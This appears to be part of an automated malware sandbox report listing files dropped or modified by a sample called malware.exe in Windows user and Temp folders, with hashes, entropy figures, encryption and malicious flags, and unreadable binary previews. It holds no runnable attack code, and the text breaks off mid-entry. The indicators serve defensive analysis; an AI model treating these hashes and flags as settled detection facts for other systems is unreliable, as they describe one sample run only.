                        Category:dropped
                        Size (bytes):65644
                        Entropy (8bit):7.997118579442323
                        Encrypted:true
                        SSDEEP:1536:DDbqsWqEnKqZTICojC5oJIMNZ/5gkukQq6+KAr+aYoVE3IUe:D5W5nIm5od/5gkuFq6+KaYo63IV
                        MD5:1B75714AEDC086C72398228D452BBAEA
                        SHA1:DBF5B3F0E5E130C1F1D2A85D79E8FDDEEA1B0B23
                        SHA-256:C93346375D7F26944B626843C0522A2F6221C33FF16575572F5DDF8AE622E275
                        SHA-512:B29E83F56DE799AE3D795B704034AE6A301AE21B19DE3664F8470F3C66128E4F20F12546700057CC386D8B49227945AE3BC316E03B858FC081442DE84F375FF4
                        Malicious:true
                        Preview:./.......(.P.Aab.W..v.faf...<..hx.9!`3...........\8.~2.f..."...\RaF.6.....s.70...Y.0]E8sivB...oK..y..Fi...O/a)..!.p.q0#tYD...{.S....0..}.....F..k..i.o..T...x6G..(|.H.........s.6.t#vtN.!...q<|.........`Z..^u.....`.R..0Ic".\.E.#iY..Y..._.C.7x..P..L..."x.o2G..\L...>...U.O.Q..l.a..=o.1..#.f..)....T/Z.].J...o.V.....:A..m?X5.jR,.1...I.W|.....(........6.`.Lp......nA.....J....[~.+.#H.b..z.d..#...y.T....3:.\.....P.....`..P^...p.u.m..........Ciw~t......Q6...Uz..> ?....&92.....pG9...o.......@.u.H.....A..#at!U.s......#.."{...p9....z.5..*..j..mX.'.1.z...ZC..t.3])%s....f.'Br)il@.......N.<.#.<.Ry.EX#.M!..l...*..!..0u.v..O....6{....S.m!x..K(...s..eK....t.1.%...P'3q.|.TB.|.S]@.pM........?:0|DF.g.......S.B...R.p.NfB=....=}(+.....s.S..Kt...a......To.B.:).z......Q.."..p..eHc.....!.f:.......V..~........Z.?...tf.Da$.....+@Bw.Z.....8j.$.......w.[....L../..l.IW..,...1r..5%)....Bq....#....I\......*=..z....M.......X.w=.|.z.mbI...T.XQ...7....=..wz...w.2-u....q.....y

                        C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65644
                        Entropy (8bit):7.9975248298772135
                        Encrypted:true
                        SSDEEP:1536:LhhcLAou3/RGLxMIvStUKKUeVhWTImgxB98KG/jXhJZVxx:Nh4uPgLxMcp1ZVhdmgrP0X7Zvx
                        MD5:7BC92BAB1D08B3A75C1705033352972A
                        SHA1:6F74C9EA1CEA10B015B1A7FD8B06ED25BE8B9AE4
                        SHA-256:275689BFD2107112E9C4225184726D5FA92A61CEEE7C146CAD3F4967AE259BB1
                        SHA-512:A4A6B41DA38932F5E758F22CE183B0A0D14FC0667D711910B3A3364E71AE0FBDACF27809DE27FB2B3011D41C9DE9745E17165EE11F2FB28AAB54F0488B586A42
                        Malicious:true
                        Preview:..m...g........]7..l..VD=....$x.....F......J]i.Vy....;.]...!)B.b...KWYGz"....h7,.b.'t.$.Y.P..,$....X.8..9....y|....8...D...h.|5>....4....@..}.._....t.G^k.8U.....j>..F....V..9....tfO...yK..THz.Eq....9..%-.....K.>...lI........... Z<..!.....Hv.....3._...q<DV._.m<wbj.N*.W.'`....t.w....6..2).2RC....J.v..9...r.C.....NQ~.."...$.G..f..9q..#"...L...~.E...U.\...|..0.g..5.W?..)J+.=..M=....X.gU.47.f#.R...6:..;.r.U.ce..ac.f....z..t.o....lI.^e....%....:.1..l.5Y...T2!U.v.u.$....f...{.e...4t.GW.....V ....Yh.`].S..e.W}.m.Z$t.w....k+.y.%&...?....+,z..8Q...d$UJB.S....]S....P......(h.`.q.U:...y{....g}(_..\3n.S..1v..!?.#e...;.%l~........id....3.)...)f.o.y,\v...U.U..;t...R_6J....4vW......%.w.....e.F..2...r....Lc.3&.o...n...4.j.0.C.e..Yl.@Xu...?.)+q..8.K...y.J..!.TQ82(.h.5.=bZ&.a.g./_z]A.A.<.:...A43k...F...o...gu.kd..}..r".d*....e*.<t..^......@.X....J.,.....KA.3G.V".H..Z.t.rk..7\p......h/Tll....t(.7.(B.(.L....)...k./hhO...G<..{..."r..e.......E...MR.I..

                        C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxStore.hxd

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4194412
                        Entropy (8bit):4.563980470775105
                        Encrypted:false
                        SSDEEP:12288:UWRW0WpWpWVWXe/WxWFWJWpWGWcWrWPWhWpWJWxWEaHKm:b
                        MD5:A324096A1F0FF08B429439416DF29D05
                        SHA1:3A3986708C566C81926528DA081A96FE7684966A
                        SHA-256:0D70F0AD8288475F7FAE8C3B1A546D925264EB1744B4733039A6A4AB63864DB1
                        SHA-512:02601EBEF8A2B069A6D58FD7388439AE37B14173146276B7C30C44B72A5C336852FC4F141DDE2FC5C0D2AFE5FAE27FDDED672FA011FA4121F6D45BE74FF1DFC0
                        Malicious:false
                        Preview:C>w._.N.".U../.l......oB....7..I.......o...=p..va..}..,......B..;..Uc..~...] ..d.........GJ....4...a...].P].......CCi..OY.....9VS`.7."y..<..z.".Z.l.v.A.c)3_.No.N.|M".k..Y..F..F.`nj....$ie.T....<.S..6........v...!.G.#..J.o..J...d...34.O.'"........1.2.N...}.W.h...[`.b3.Y.....6...o.. ..l....w.*...W......%...#\.pI...c....~v....qR......Y.{Z..v........7..g5.hN..l..f....k.o.1.&em.yYL9.]A`.1.iDM.o..,..<....T;.......>........u.a8._.?.1.h...*..#!N.W...Y...*..h?.E.K...C.....f8../O.)L!].-5...n$.RS..'3.~.........>b.pZY.*.... ..3.M...ob..i._.._..-..<V.g/.f|.(.2.=n.}.M.K..6.|.6.t....5.zG..wl.?i..u..y.{.$.YNa:.n......23.W$.......1..?..... .l....pN.2...sycs.d.7..6. Rv..=.#..4.A_..D....)...".g.Ph.O...{..k.....[1&.R...>...G.,._..... ...asX.L..r}.z..R,...|.D..v+.3..f.B....0.-"...N.W.L85.V:.#VE.../@.U............................$..r.X3Y.i.-........&fs......dEK.\...DB.s..Z....b4..LR...O..(..W:^..nu..Z..z,.] .....CgC..3.?....!.....I.......:.

                        C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.988925527476003
                        Encrypted:false
                        SSDEEP:384:7qRUU75okF7U2/oP0mzeh1j2jHxCLOXMuuO+yY4nVaueQ:7O5JFo2/ofCTj2ESD+2nX
                        MD5:7959F3BEF5D409FB2E6BCE1B699EB370
                        SHA1:35756A648604AE82BAC07A19F3D4536B506FC83E
                        SHA-256:C176D19E8A3F20340CC408E6D3D5BDDF7FD650EB6A49D2BD51693EC434533457
                        SHA-512:024B3868651D4B5EA2AB102A1DF7759E2262361A359411038FAB525FDC68A216D5348C3D1C7C4A6C35838BF74C562B8E5013CB479CDCC8663194CC31F321BEC4
                        Malicious:false
                        Preview:h.. ...l><g.Y..e'...n..qdh.d.O.....3..y.c.@......i.....Z. ;-a....... .7....t.y7..p.;..8\.....%..j...D.QR#.;.........)V.....)........W..e..i..Uu.~..g@..z.'....{.=V..a7.qap-....q..........X.4k#..A.v..6t|......H...I.Q....4W].=?g.R..J*..E&...c).#...].F...`.:W7...S.y..j3H..sZ^.<.Q..D..=.|....I..Z.....{Ep..>$ ....\5X...n...ch....? ......'.r..qp.A......q.W.Z..5.y.4.....R. \...;._..y...s1..y...%.s..O...>E^.M.xc?G...!"#.kC._..`.)....vEE...h.."...p....R.H .Y.e.x..C......H...#...w..7.....-S"..5...|+wp.....7...........\%..y.L..]c..Xg.....9..]X....GVR@M..V....`T..h-@Z......D :.R|.m.+.$Y.!0p.=^yxz..]..S......8..4F...P..}...*.o.cq..........~...i.W..D.j.......7..'........-..F.a.%..]......^..Nv..>4.@n....6.k..X.(.K Y........9....f.h.,]....../.N..\..~.-..C......#FG.............K.....j........*&s....../A..#x.....x8.d. ....E...!.D}./.HF"1.u...rm6.7I_..f.Q4.`...5...g$..|k..b...!.~...7w.._.....Km=7.i........p_.Q,.....cm9.4.Y..v.W........o.....T..)/....Z...

                        C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.986369314602463
                        Encrypted:false
                        SSDEEP:384:m3AnRWfInWc3Ee1sOlNTAws2xoqZjzYm6pgF51mMC:m3AnReInWcLsOPMwsq76eb1c
                        MD5:99C1F5CED814D3D9A6161C106C2E6B15
                        SHA1:7115D286255C8FB9CF434AB36C7CD0381682C822
                        SHA-256:C222FE3C1161E8843D8B53BE58D7D8031F23F3228121725740C63B5CB4A17D41
                        SHA-512:08405E400A5C390324DE5B3148CDB2282AEEF1A7750481B41F2263E787A6DC120D96C92163277ADDE26749CA007DD1F0C857E64F59EB903EA43DE61DE4EE72DF
                        Malicious:false
                        Preview:...W).cD.....#..6...a.....r.`....$l..v..bI.wC....=.4..&......n..f.J.5.+w..4S.....'...w..9w...&.b.5.A}.c.c$Wz#.u..X?....LWm...ME...6..}.{"%Vf.c......].6.).....>7..>`&.A..J!.vr._!r.c.+[...t.#U..7Xs.<.....j. .+.9..e.g@~o.m....Y.'U..J...J...b...J...?Rf.'............l..Yz..]....\(."..qG6....P..{ .M...`...gR0.%.bz.q,..<U!.(x...y....:..V.......5...-.]....s0..;.(=.U.....P.....\.....G.7..5.Bk...v#.N..~l...0..P..B.f)...1..T..r..Dm%.^s.r..9m...^.!.....Qg.vy.+M...{;......9K........L.-...L....~|...}.[.cgW....l...J.z.`..F...1<..84.Gm.(.l+h..#..d..`+.....g..S.}e".....\.v..G....>F..!X.a:.s..;.......?H.nf3...=Z-...J+C.E.I#9A#X.......a..z-..o.<%....y...i.#....i("...95M.+.....#...z....../.j..z..2.+4..u...C....u.k?..k.`.........\#c.....i.."2*.x..:l.R$..k.n.^.[.......Y..C.V.(...k.K.Qx.zE0........uN)9.`.b.[..vF%....Rt..P!.IMQVu...lhw..g:+..KW@D..2....]..,...w7Cw...WY..ce.`....Z...Y.~F#..J~.QD3<..KHya@.f..&.;...I....7V ......4...QC5.....o]..hr..E-./.*h

                        C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24684
                        Entropy (8bit):7.992309965844585
                        Encrypted:true
                        SSDEEP:768:DgFrIK8PnRc3BrZd9UUyHD2r1T2TbKTBv1u68kS:D8rIKCnCxrKHHD2r1TSKTBskS
                        MD5:B9AB0E6E97D9ADF64DB4AD46D4F92108
                        SHA1:ADE3EFDBF3663A409586E69EC63DCC583CD90FF6
                        SHA-256:90845856BDAEAEB3A9161A05A788A261AE84E7B98268B7AD732AA90E4B836B5D
                        SHA-512:F96CACC646D39F4C8EC3E63E6C6A2C16849A4A43791E2B11C7BFA5439B2A24EE5479B4F85BC9196E536B8FAA49F4E8733FB1054D9A09193F5E2237C26B20B182
                        Malicious:true
                        Preview:i.r.....{.....p....M.W..r.e..h...f?...Q,' ...>....A.(I..8...N..0.b].E.oc...r...w.f.........{.I\.v.m~L..O.....u....-.,..J#.n .5n}b..!J7.6..S.....H. ..}..\a...I..n.............?Tx........]<.o......QQ.Bs...^M..-.V.Y-.......U..a..J.......-.#.S2H*..Mnd.{..Mc....L....\\..2..M'...D...9)6D.aa......g..A..V!..I..H.z.......,......".s....`...X....N.C.)...d2..{#.<v~.e...#2"...?O.7.5.....8BxK.y.U....hHC.1a....6k..Q.s...r. ...y($..U...FH.B^.gZ9N.:.X..+....<..4.`1S...6.....>.p..1.I.3Y.".a..\g.Jmv.....9..F."..(,....M./.='...[5E.G....t...jx...8..Z&c..#F.#.;.h.n4..jG..@F.'....z.Q.>X........2e.G.M.g.........M(.T.A\...m...x.k...&.]..:.K...r........:.ba...qN......(1K..(.9q...v..b....L.D%..8i.;t..j....R....RnBo....P.'.....\..~~....=/O.bg..l?_.j^N.d.@....../..m..g.. .L...jB...E.....H.x.....[....c+..}.1Va....g...Q.x.....5n...*..q.iX....G...|.".x...<..Wn....c....^.+..\{...4.5.e....n..Jb.....a..v.../.Yg{...>f....q.K...1.m..y.,.z.XGQ.^c..F.t..z#..mn.q`T.?.!q

                        C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):66316
                        Entropy (8bit):7.997445885767791
                        Encrypted:true
                        SSDEEP:768:osrt/lj9WYd4YvDj3P8oJTOds/efRgYkdZpNkSGjNXx5u652ui/SZNAavpXS3P0l:JR8oJTMpE/qJX3uxuKdI43gioqoy6Wl+
                        MD5:B12731576181EBCE61166BF4AB4878B4
                        SHA1:7B473672FBA5DF3851B508BDF4B8B0B2A3CDA723
                        SHA-256:880385EC879447712F71694BA6B3BA0474DDB374570784E7FC5DE2493FB96293
                        SHA-512:365A81AF2B2C639B01EB2861365EBD45041B2355A32942DB8AC1F7B69504F4F0F4448328E68464A700090D72A7ED2F04EB92C65E3181255583223068B199B206
                        Malicious:true
                        Preview:........5. ...d\Xi+.sd.g.rD...G.0.....sq.n...+..4o)4<........e.g{...Yn.=.5..k..;..j.^.r..c{....B.#..'......X...rq3*..#.u...1m..f...Vh=....b.u.d.b...$.?79.m....[..u..E..6..q]....-....'.>..~t.h......xa.<..D.....w....Q..0..........1.].....<.P.,b7.............\...@....@~...8{(..>..>.D........N.1.......T.:..z.....P.U....cg....hv<...%.w....}...Q.....5s...O...o.....Ox.4rJ...e0...B.Q*.L.6..9~...'|...h.......W.........,.sh..Ee...".%...d....UiGj.....V...+.\. .X.?z..........@.1..DO..@.oX/RwJ...c"]u.7.C.*..5....."...%@..[J.......m_j...p....^...,TZ..C..lF.<.. ....Rs..."%..^5.....k^].'.W#.1]..!.V.bc.fa.R.R...7t.&|Nbw..$Ven.<.>....U...J......q..#.....&...neNy.......rkf3.I..:..$5.....T^(..g9#.-..a.p.*_.../.$...a/.?.....is...s..#.>..a...H.j..=_'.fH..?..~.....Q....P3[].j.....xE~..#..u..k'T.Cj.G&\L..V..ZT'i.eQ..J&..0....k.....`_P..bJJ&..G...p.I.W.....Jn...C2.twc...).|.....{..q.... [.^.w.)5 ..+.m.......y..GSN.k.a.#._FT5<..qh0.....~....`C..`.....L.6..j

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):42624
                        Entropy (8bit):7.996239088336872
                        Encrypted:true
                        SSDEEP:768:3jfmfev/v+nPNs4f3CO7E+bi6+zhuKIf1Tnpadkh/dgKXqxVuG/zwxah+i:Iev/gsayONu1zI/1Tnpau4KXqX5h0i
                        MD5:77195362BC5ADBC177B92C211BD749FD
                        SHA1:B635F5735D23281DC4D468B0CA84F2F502703D83
                        SHA-256:362A3D1E71C7766640859C56BE1239CE5136FC1FFD37168D9A46F98767C14254
                        SHA-512:6EECE45C3D4BAB37C40D20A0C5E7988AB13B1CC0E95990027B9A8094535F4202C088385FF6904F92C785752EA53DE827267476421D678568AD47EA7DF29BCE82
                        Malicious:true
                        Preview:....v5..0..!%v...9.,.o=..l.. ..XC"nG....f.#......i..N.Mj$l/.$..[.R#R{.V.,c..#v.8/..{o...uA.((TUI.k....T[.....p....&...5A..g....=....!s8....g.^}..Cq.`iU...~8tR6.4.p...je..<k...].eBu....'.(..!.~...g.q.&..7.M.s..+..P?5...CB._<..p.PO..Q.E0..........*...IkEt^..T...<."R..u..X....*C....u'.,.p...1...f.h.2.*0..7Vn&.A.......c..St9..D.**X..B/..K....5.."... ....fM.% K;.]@..Eg..d.4^.X.O=....S._.w.....a...D..R..%...X..o'.w.$[..,...7.H...~.w....k.3......E...J ..g.Z.........D..:!..&w..88W".(.....x..Or+H!K..SQ..m.....I.B.IXW..0.^l........2.~..Izb........k.8.'....d0Hc...`...1....Z.$.b(..G4.&%..|............|...7..mu.a_1\.....`.....x.a......cAZ..jC....,..'u.....m.5..,.V....'.8.......Xu.@.:....sVnb.BF...h.p..}...1..?...$.G.=...V$./.@`.~...a...o;5uqX..,........I$..M..L......FI!o.{..Fw...u.."...M97.2.j...{z...}...#.34)i..C`.......y.b_..#6I..P.e-.K..K...W.n... ]i.4^7.+...k....U..h....?',...s..VZ!.\+|j..8.....F..i....G-q$F8Y..dt...Ko*(....U.g.P^.....@....4.

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258a.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):462062
                        Entropy (8bit):7.97402194213341
                        Encrypted:false
                        SSDEEP:12288:ew/JXcQmiksiNAm0GJqhyWmMTDS2mC29kcRBv:euJsQ+jqx62erXv
                        MD5:B0E3DD1F6306610BE3EB2EF88EA42ADC
                        SHA1:734F92E336541DF2210846B4FCFEED7C9CEAA026
                        SHA-256:A1C5AF664AE45311BFD8EE79F320A95503E3EFC817BCF133E90F5327894E6774
                        SHA-512:32FAEAC319D77978622070CC10481F91F6225A6A2E3680FE3F71FDAEF6EB4D503B1BCF8636EE60361797AD70B5D60F7DB1F193CCF376ECD03A7571D9E17CFF3F
                        Malicious:false
                        Preview:EL....'.Lw....\..'n.s/..z.......J..^Q.....N@r...........Qm....TK.E.C..;...:.@.Q!.M.e..\..vqWE$.H.r....gZC...u...<C.!EHZ..v.-.~h.I3WQ.@#..+.h.,d..;.e....}.,..64.V...."......0o......P.../.BH......O~.?n....8...........`.%..V.w..:.P..p~.-@.I.$..3;.9*.t.......$....u{:..@...r6..^..e....zy.e!..e..z....E.........a.!..1V.P.E..`...S.c)....zd.7.1.8..^..>.AO1O..........U.v....i..:AH)......(.d]...\..s.<..s...*P.......`.}......PXY\>...-G8.^6...1.e..QB.....d..6Q.....d.l.qo....7..#O..]...=.&.T/zD.a.k..a......O.......{....}.........&.....9.:58Z...1..<`.~.?p........h.y.....r.....9....8.*..2.b.b...S3.......X.....x...C...h.,.`FXa.(..c....:.....n...5....GX^,. F..)7...0.]}..w.w..f...D...^D...G..j..i.,.....O.....!.H.M...(U.......&./...q...._...Fr.%.?.Y^..+.C.....K.A.~.^?...............P9.).....e..(.`......t..=..S...b8...0.......hd8}Y.(....m.....bC52nK1!K..DDK...}.T..M.p....2..J,.ANH...~4l...6.g.N..hI..7..'.....(.'m7...".qu......Erd..*..e.V..\I..Y

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258b.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):289750
                        Entropy (8bit):7.986092865789871
                        Encrypted:false
                        SSDEEP:6144:P4QZR2OvvZL8aP0IP0JnuH2tx9Mz5J/RHqbqXmLInKqp4Hks:PDZR2Qv1vP0IPSmcUzFnhp4Es
                        MD5:EF068DF46CA461479D3E6C8224F1EE22
                        SHA1:5561E682A7EC93E44E9EBF34039599447C32E4B1
                        SHA-256:444B96893BA924015085739D6ABCA6C8EC6FA56C6FDC404226574C302305C6A2
                        SHA-512:49871E31E29C0C3D6AABC32073BE45E484B2296EB78F0BE653A25AC1A87F8CBB5F98CB3D4607E1FC716D9FDF202ABB8DBC71DC75D327F432DA3B8683261197F8
                        Malicious:false
                        Preview:..|.k.>.O..$..L.7U.+<.jB$....B.6.]......'.3..h.Qh.~.r.Y....7.@..}.%J..n3...c.......A[cvq....)H<..B.....1l-.+.....<......!.5G{..]C.P.O....[.q......>.uu..Q..=.l2.H..`..!D..M.2...%:z..r^..`.VH.G......WY.|....j.S..yQua&....... .(.ZL../6.d.Phe....X.g..h......h-c.\..i.;.GR.P..#.'.s..oz.....n,..]Y..h.NM /.|.B.K...CTU..E~....2j.9....5.....g..v. .....1).u.'....XFc.O.A.m'..v`A..Uf.3....k..'..[..6....X..YM..c.Iq....f..v....v..y&.<.j...h>...'..m.....?FKQ8.Z.....B..QxB.."..<.ZLh. ...X.n.:)@.....C.r.+...e.......A..A.oR}..n......[.D.l....<.O*.X.Y.Q.(.D|.)..,.#~.;......z._.Ye...H.. :.^PZ..2..f.Q.<>........z....C(.T.sl.....FU.".5.t.m.KI.s..{.iCCD..6.?m...I....9...!........cZ.........Q...Q.R..8...:....."......kZ...e.....*.p.....k..Ni.(|.&X.H..XZ.x..g...@..l...=...e.#W%.MWB..3x..MB.>d......~.i)....x ...XY......4....>.G.......j.a.Z.....<,.en.>]Hf.@.L..@-a..g. ....C$.m,.....3..N..PH.8|o...q.Xp.QD.........b.p(..KF....1m.i....t..t..XhG'...k...k.)..("e.s.G..

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258c.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):98342
                        Entropy (8bit):7.9981716500241475
                        Encrypted:true
                        SSDEEP:3072:gVvs9wsQJQoH8Fp03iCa+GO9CQRQYDFTpJyt:IJJQoH8Fpea+YQRQYDFTpYt
                        MD5:CD90AFA0A136C4EC8F60B884B8861706
                        SHA1:1964CEA7DC74D1B44B7EF2E04DEE589745223797
                        SHA-256:CFA2149DA5A975DDB2ED1DA56BBC9823DD11A39B95DD12EB50692AB64C0C7169
                        SHA-512:45A7B0FF4256603C39F1605B16A48CB3A86D22D75C202D0540AD0EFD6ADC3472DC6B569C496E040EAAB51187BFDC76950763F1817C2D38ADFED9E4E2A18B2A6B
                        Malicious:true
                        Preview:{...`p.F. .vD.>...W..........5E..+Z..L...0...A.z%..H.gDrES..@.e....=|.)...m......C+...c3...\a.....:.......E..X.... ...k..y......!..P...S.Rxi... .....F..{.,..p.jY.N.*....t.\0.....WY...@Q........s...CF..2.Z&.i......5t..r.Z.....cH5.....d..8.nT9......~.......yn-.^..[.5.i..bG.XK.3.R..=.M...D.y....l.{Bn.#...0.A...<..X0..g.R.%...:..y......*.....0;..._k=.u....Q;-8...3co....af.X#-p.lq.....l.Y.N'.....M..qIj..b.s...C..c.5.z.SMx.`..5E...]..;.').M.....*...Bs.h....p..R.R`#\F............d.6(r.........Y./s.3m.....J?.u..xs..\..s.bq..}..b....]..y......$]...)..fB....&.i.._pGrh$..m.7.a.NmoN......-..........k{J.'......F".<."...t....(+.g-.5........X..}.......T.|.v...[.N^.....|'..7U.a...y.~.KI...e..%...k.5.v~.xO..Z.dU...s.XYX~,........?..W...3..#..l.........9...7.9.4!/.j.A.a......8..f..o......uj.@..4(AO....k.}?..r...dBt5...B...8..h.}K....2...*..N..`U..YXe.......<..y.y.Um.9.<..v.~e[\.#.aw.'..FlC....<l./.(N....3..1X...y{u.0'..d.9..C..Pj.1)d......2,..A

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1305.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):395688
                        Entropy (8bit):7.97670244845141
                        Encrypted:false
                        SSDEEP:12288:MNjeqrfbee/mhRrcB6J5xw01MhMUG+2iW32+Ty:Ae25mhRrcB6J5xXyCUG+2j3W
                        MD5:F3097590BEE3C819892F69B00D6BA308
                        SHA1:E456F403873B5B076B530FDCACC120A44DF22F74
                        SHA-256:01EE67B867448170AB65A235B646CEEB445C896F55FCB6E0130FF5D3832C3470
                        SHA-512:F7D6C3DEC6CDCFD552241030FFF4D4818BDAE66CA23327FFDAD9525B73DFD238E153B1F27274C9B2B019DCC70AB615CFA39D7DB78C8EC4F59C8ED442ED105F98
                        Malicious:false
                        Preview:..V.#6.7.....p..s.g..O]...'F.#.%..GQ..*..F..?.a>..q..c9J.nk..$..t./:d..h}.>..&cL....$..@.r..M.z.......0t..z..*o?....,P....h?.;.B...nA.+[j...'...hdQ...~..&.W.eM.W.&.D.......3.<....c.`A_/.=..c.?....IBM;.....h6..o...x............w.^..Vb..f.T...~(.B...o.,.k]...T.\.l......%W...=...]...8.drRM......a.-M.....p<.Y;....p..Y0..g....q.O.&5.].d.zD...yp5..{..)..)m...7./8V.0nP.#d..I......c`.....+...m*T..F^KW7...\.D<_..*.dm.N...2.v....].{F.m|.7.D......UM)v1./f.......V}.8I.^j.hH.T.l...DIw<.~V,.e,.JD.5.[....C.....B..n.t.d.\.9W.?..U./s.....v%..H.....Z3.......,......... .Q....h......#........c88Y.%&...i[.|{...d...}.j.Q..?/..(.....U.."o........".>....y.~9.....WU.k.z.H..<..^....[-..*..B...px..".7...).D.`.E....7.i..Li..9L...o.</..P.A|.hO...s(^./.[..W.....(M.X.a...S.......$'..3Sd.f4..c..&..`..,.-...R...W..V...e..b..^...c.....=.L.J...b.......i.E./.J....d'o8y.....O,.)8.... ...).IW./.......xbZ*.....9b.".5@;..S.`.d..N.*.[.g..h7".......b...[a*...;..;.*S.<2..3...k-^...6...

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1309.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):138130
                        Entropy (8bit):7.962974908565523
                        Encrypted:false
                        SSDEEP:3072:U9mSeqVtwea/+iv2S4VzOWsAdLTDa1iu+7ohpzAba:U9mfq+/+ivb41sOLTm96ba
                        MD5:9BFF92DB4FCF2A178DF7311452315451
                        SHA1:FE0AB7BE26DF1F29D14DFD6F732FD0C7A9EE7436
                        SHA-256:7A0EB3C4EFE7F08EDA6DE22038655EA6CAB779073C3147BE079D58D248E0F4C4
                        SHA-512:6FC94F9D312FCAD8033EE5458898E211CD4AFE4B221DB29BC6BA26F5F11694A69FF2C5E1FCE7D4F5DDC059098EE0AB3222008265610D4647DE5D149E80C9E46C
                        Malicious:false
                        Preview:.3.o....1./qiZ).....f..7t..S.e..H.N.Emj.6...z..~..I.9..!.+1.....Q...\H............./..r.0u....W..._W.......%..I...v..J.<._/.q."E..p.G.qBq.....,....*L..O.vG..jr&..tLx..ri...%...,.....P.=....D.vuhY.'y.S..`....i.x.'.........V.F.!...-.h..#.;..2..x5..'k2g`~..d.w.$<.EDv3.X_.*...N=z:..y..C.D......k{][."|.....U+,.:...|./vZtt...//.....Z.......Y.F..........Y....A#...^4.p.AT......4.W....@....]C...oi.,j.......4i.T.:......8.Cfjx......J.nfm<..`.Ce........3...5R%.......w&|).....A...2..M.@.!...e.E.@...c.......X...&..;.........$...fk%.%..k?.c..*..........}._>.i.......x.>.[.z-..z.Q..7d(...@.t....(..U..,C."...p.A.C..C.....@$6[..J..A.g.!.....d.}..Pq^.P.i:T..9..Qk..!/....gq.y.lZ.....K=...M.xf....n..vZl....%. w..:.6W..T...f*8Z>...a...H.[K.....".J^d.....T.. 7yk.a=P.^.....q5.iIr...h.....<..r8......X4I.L..........jx}l....`Y9.j...X..$...1.PjO..%f........{.F....Q..U.u.Ln"..~vl<.A..)6DY...c...Bm+J...|K.^N3..p...i_R.!..........UC.1K...5N...H.^..k.RG......

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929a.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):58594
                        Entropy (8bit):7.996675641642224
                        Encrypted:true
                        SSDEEP:1536:wV3IueTZTw7SYs9Ikc7w+AZH7oWbJtq0k/khjdnilPNsBJKiF:63IuyYSNIl7wn5nq0ekhjdnilPGBPF
                        MD5:182A534980FD5166C44FA9C99265E3A4
                        SHA1:84C0DBEFABDC344A2009B83A3BBA8EFEACF754EC
                        SHA-256:1E589FEF214C2F6D2D73635FE1643FF160C44A2C99A6D3E48AC837E3FC76956D
                        SHA-512:0E627AED6E64DD36E89F849D54BB0F4B969EBC0B15A0A7AC76ACB065FD76D7A17F93ED4ABDD3259B9C484D087DDA49C56D27D1D57E112AD7A1C03E08CD0E72B4
                        Malicious:true
                        Preview:..&..V."..W....B".v.M8i2bv....?.v#T..c..M>...L.oKG.{~../..I.!.(zu.....g...^>.d.G.,>'Jm.....:.d..u.9.hW.....Fa.$)t5..{..AI.WwC..0..6.v.....h..G.Rz...*2.^"pW|....:..3...(.Z.Ar."..!\p..yQ...8.i.UU..l.P.I.m..l{...T......1......yD1g<..J.........aSi...(L.......`... ......<..^Wd.g ..S...c.-3>.t.%..%O.YU...W..$....~...:.B<#....z.d7B.q<.......,:.4...a.....a..D.+..P.F...C.;...(9>?.'..j..#n".......\g......C...P..r..!..z].........2OaTT,K.(N.5.E..+......5}.B@_w....!...j*...ZP...a..P.f..OC,xh..C...5...J,..p.P.'tN6.....d....z<..m.!....6t..*.....D..f.r..F...~........K.T*.W._7.?=./..!...i...j.g.'...SF.AR..p....p..]1(...Kqznp...]...t..y.9...-.G....s...c.....6.]....vM.?%.1.......oe.Bs`..L....G.R...T.....x+..u......!.Gz;....U0......k..[......\...gP#$.E.._...h.Q.0.]..V.5.....,.G.G...-..5..1_iM.!..5.c?=lZ.....D.Si..S..X..3Z|s..f.{Ua.I...........i..GT...#$....^......V.J.u.g....pGu.q....Vl.....Nr..n.:..1t0.4.zK..m.,Q..y.g......#........-w.s.k.Gx...$. .K3]...<..m

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929b.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
